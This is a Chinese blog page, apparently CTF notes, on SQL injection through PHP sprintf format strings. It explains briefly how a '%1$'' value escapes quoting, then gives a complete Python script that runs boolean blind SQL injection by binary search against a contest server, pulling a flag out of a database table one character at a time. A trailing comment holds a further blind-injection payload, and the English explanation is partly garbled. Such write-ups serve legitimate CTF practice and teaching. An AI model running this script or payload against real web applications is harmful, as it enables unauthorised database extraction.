SQL注入

  • MySQL 基础语法
  • MySQL 相关函数
  • MySQL UNION 联合查询注入
  • MySQL 报错注入
  • MySQL 布尔类型盲注
  • MySQL 延时类型盲注
  • MySQL 堆叠注入
  • MySQL 二次注入
  • MySQL DNSLog 外带数据
  • MySQL 异或注入
  • MySQL 注入常规 Bypass 技巧
  • MySQL 注入进阶 Bypass 技巧
  • SQLMap 基础使用
  • SQLMap 进阶使用
  • SQLMap Tamper 编写
  • MSSQL 学习
  • Oracle 学习
  • MSSQL 注入深入理解
  • Oracle 注入深入理解

格式化注入

sprinf引起

当%数量和参数数量相等时,由前到后替换,当%数量多于$时,we need special characters $

When we use %1$ means it will replace at first,and after that if we use sprint % and \ after it will be cleaned which means our ‘ will get out and results sql injection.

#coding=utf-8
import requests
import re
# from urllib import parse
url = 'http://eci-2ze006f3h1dki6w6m8h5.cloudeci1.ichunqiu.com/index.php'

# params = 'input=O:4:"flag":2:{s:2:"ip";O:2:"ip":1:{s:2:"ip";s:6:"127.00";}s:5:"check";s:19:"key****************";}'
flag=''

for i in range(1,999):
    low = 32
    high = 127
    while low < high:
        mid = (low + high) // 2
        sql= '(ascii(mid((select x.1 from(select 1 union select * from fl4g)x limit 1,1),{},1))>{})'
        data = {"username": "admin", "password": "%1$' || " + sql.format(i, mid) + "#"}
        text = requests.post(url=url,data=data).text

        code = re.findall(r' <strong>(.*)</strong>',text,re.S)
        code = code[0]
        #print(code)
        #print(code) <strong></strong>
        if("Success!" in code):
            low = mid + 1
        else:
            high = mid
    flag += chr(low)
    print(flag)

#if((ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)=databse()),0,1))>1),"n1ctf",1) #--大概会用2S时间

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!

ssti Previous
弹shell的方式 Next